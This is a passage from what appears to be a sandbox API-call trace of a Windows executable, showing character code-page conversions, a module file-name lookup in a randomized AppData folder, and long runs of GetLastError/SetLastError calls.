\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0147.115] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ÷…¨ò\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0147.115] GetLastError () returned 0x0 [0147.115] SetLastError (dwErrCode=0x0) [0147.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0147.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ볞ᷕ駾@Ā") returned 256 [0147.115] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ볞ᷕ駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0147.115] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ볞ᷕ駾@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0147.115] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ÷…¨ò\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0147.115] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a52a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xd0 [0147.115] GetLastError () returned 0x0 [0147.115] SetLastError (dwErrCode=0x0) [0147.115] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.116] SetLastError (dwErrCode=0x0) [0147.116] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.117] SetLastError (dwErrCode=0x0) [0147.117] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.118] SetLastError (dwErrCode=0x0) [0147.118] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.119] SetLastError (dwErrCode=0x0) [0147.119] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.120] SetLastError (dwErrCode=0x0) [0147.120] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.121] SetLastError (dwErrCode=0x0) [0147.121] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.122] SetLastError (dwErrCode=0x0) [0147.122] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.123] SetLastError (dwErrCode=0x0) [0147.123] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.124] SetLastError (dwErrCode=0x0) [0147.124] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.125] GetLastError () returned 0x0 [0147.125] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.126] GetLastError () returned 0x0 [0147.126] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.127] SetLastError (dwErrCode=0x0) [0147.127] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.128] SetLastError (dwErrCode=0x0) [0147.128] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.129] SetLastError (dwErrCode=0x0) [0147.129] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.130] SetLastError (dwErrCode=0x0) [0147.130] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.131] GetLastError () returned 0x0 [0147.131] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.132] GetLastError () returned 0x0 [0147.132] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 